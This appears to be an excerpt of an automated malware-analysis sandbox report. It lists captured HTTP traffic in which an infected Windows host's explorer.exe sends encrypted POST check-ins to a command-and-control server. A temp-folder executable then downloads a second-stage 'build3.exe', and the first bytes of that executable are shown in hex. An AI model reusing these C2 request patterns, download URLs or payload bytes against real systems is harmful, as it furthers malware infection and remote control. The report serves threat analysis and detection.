                                                                                                                                                                                                                                      Data Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:24.307646990 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://fjcrkcgcbfgpa.net/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 348
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:24.307719946 CET348OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de ba 66 5d 02 c8 a1 c1 64 1d bc c5 7e
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]d~ZdsPe:EwUG@p%6@-Ia,R$s}%FL QNI5N5WK?XP2{O\^\!$+U@Dc4[w|K
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:24.543802977 CET578INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:24 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                      Data Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:24.549628973 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://poplxshctilgi.org/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 327
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:24.550201893 CET327OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de bb 66 5d 02 c8 a1 c1 64 12 b8 92 09
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]dvvcu4G@rqxs"N([%6!r>0YkXuO!S8UkKwe=,Rymv'msgj6;hkAehX4!-;c7HMJ6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:24.783485889 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:24 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:24.785697937 CET284OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://cjbcpvchovjhab.com/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 163
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:24.785737991 CET163OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de b8 66 5d 02 c8 a1 c1 64 40 cb d7 31
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]d@1Rg>E&EK>/aVK,hd;/!_5*(sorxKQAJ4Nz~5y
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:25.019031048 CET258INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:24 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                      Data Raw: 35 45 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 83 54 0e 7d 17 be a1 83 bd ad 1d a1 52 dd 6d ba 19 59 9d 09 f4 a6 2d af 7b 64 0f a5 b4 89 18 c9 2d 84 1b 8f be 42 c3 5c 9a d3 f7 27 69 98 d0 4b 6b 80 a7 b4 0e 89 d3 cf 37 b2 33 ce 98 77 4d 1a 7d 4b 47 98 fc 64 a0 f2 5c 90 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 5EI:82OT}RmY-{d-B\'iKk73wM}KGd\0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      9192.168.2.64972881.94.159.197804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:25.973948002 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://myghbxnpjrq.org/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 125
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:25.974033117 CET125OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de b9 66 5d 02 c8 a1 c1 64 46 a2 db 7f
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]dFBe2$i<Dzs']hfYY
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:26.206478119 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:26 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:26.230734110 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://dbtcjwrtgvaph.net/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 262
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:26.230762959 CET262OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de b6 66 5d 02 c8 a1 c1 64 5a b8 c4 66
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]dZf=2_08O't%ctw$a{ 65nciY~.D#W]{X*o3(MH:d';ay5>Wf]K6uj-<6gpL.X
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:26.463373899 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:26 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:26.465593100 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://howwnamvvlywf.net/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 265
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:26.465610981 CET265OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de b7 66 5d 02 c8 a1 c1 64 14 c2 c0 70
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]dp"`$&e3|;[i4z2O_`=^*`,NN|EW15Yix4Q@3m}I?n\a@._,poya\eTV:+_bRur@@J
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:26.700393915 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:26 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:26.707180977 CET284OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://wyuccaycqhmwcb.org/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 181
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:26.707204103 CET181OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de b4 66 5d 02 c8 a1 c1 64 47 84 84 14
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]dGEt}-_g)yM&Y=,c=|U31s*1AuL.`kQt[B7T_:T%u:NH>
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:26.940794945 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:26 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:26.943140030 CET285OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://nwcftddidtvatlv.com/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 192
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:26.943181038 CET192OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de b5 66 5d 02 c8 a1 c1 64 17 b0 b8 7a
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]dz-z}5TyXfS~yBid$LJ}'v%_zDy39U3ZDCh[M${-[x.}I=
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:27.174705982 CET234INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:27 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                      Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 8d 43 09 65 0b f9 aa 85 a1 e4 12 ab 11 91 67 e7 55 5d 91 03 f2 eb 78 e1 2c 01 4e bf ae d8 1b ec 07 8f 46 87 ad 76 87 24 e9 ae 93 01 22 ee a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 46I:82OCegU]x,NFv$"c0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      10192.168.2.64973581.94.159.197804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:30.307657957 CET286OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://rqpbkpdpqtpulcwg.com/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 171
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:30.307672024 CET171OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 84 de b5 66 5d 02 c9 a1 c1 64 48 d9 8f 64
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]dHdh-<LQ"P1akZ\x&C+';C5$ujNHZc&5%+M*liw
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:30.547269106 CET578INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:30 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                      Data Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:30.590162039 CET286OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://exmgwmmbekxckvpr.com/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 118
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:30.590199947 CET118OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de b2 66 5d 02 c8 a1 c1 64 21 d5 ad 24
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]d!$Em|k@Ob4$P#qvn ^z,K
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:30.827747107 CET361INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:30 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                      Data Raw: 43 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 bc 51 de 4b d1 fb 25 83 2a e8 ae 95 58 2d e4 be 41 2d fa a5 b4 6a f3 91 be 5a a8 74 9e c9 37 40 5a 3c 0d 4f df a6 3d fd dd 47 87 ad d3 1a d1 3b 93 84 69 77 3c f0 29 76 94 c8 9e 94 25 ff 60 18 88 4a ef 0a ea e3 d2 63 d1 82 f6 31 db 7f f3 ae 9a e0 5c 8c c0 97 18 1f c4 5f fe bc bf c1 fa ad 12 15 a9 2e 8b de 22 82 7f 65 46 b7 8d ab e6 a9 41 b9 1d 34 99 97 be ea 8b e6 78 82 74 34 36 6a 3a eb 87 09 c7 29 aa af ae 2e c0 d5 85 04 4e 30 63 cc 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: C5I:82OB%,YR("XQK%*X-A-jZt7@Z<O=G;iw<)v%`Jc1\_."eFA4xt46j:).N0c0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      11192.168.2.64973778.89.158.42804436C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:36.220237017 CET96OUTGET /files/1/build3.exe HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                                                                                      Host: sajdfue.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:36.835297108 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:49 GMT
                                                                                                                                                                                                                                      Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                                                                                                                                                                                                                      Last-Modified: Mon, 09 Oct 2023 19:50:06 GMT
                                                                                                                                                                                                                                      ETag: "4ae00-6074de5a4a562"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      Content-Length: 306688
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Type: application/x-msdownload
                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 f8 06 6b 72 99 68 38 72 99 68 38 72 99 68 38 cf d6 fe 38 73 99 68 38 6c cb fd 38 6e 99 68 38 6c cb eb 38 fc 99 68 38 55 5f 13 38 7b 99 68 38 72 99 69 38 c9 99 68 38 6c cb ec 38 32 99 68 38 6c cb fc 38 73 99 68 38 6c cb f9 38 73 99 68 38 52 69 63 68 72 99 68 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e d2 b9 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 03 00 00 98 3b 00 00 00 00 00 20 05 01 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b0 bf 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 68 03 00 64 00 00 00 00 90 3e 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 b8 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 68 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ff 3a 00 00 80 03 00 00 0e 01 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 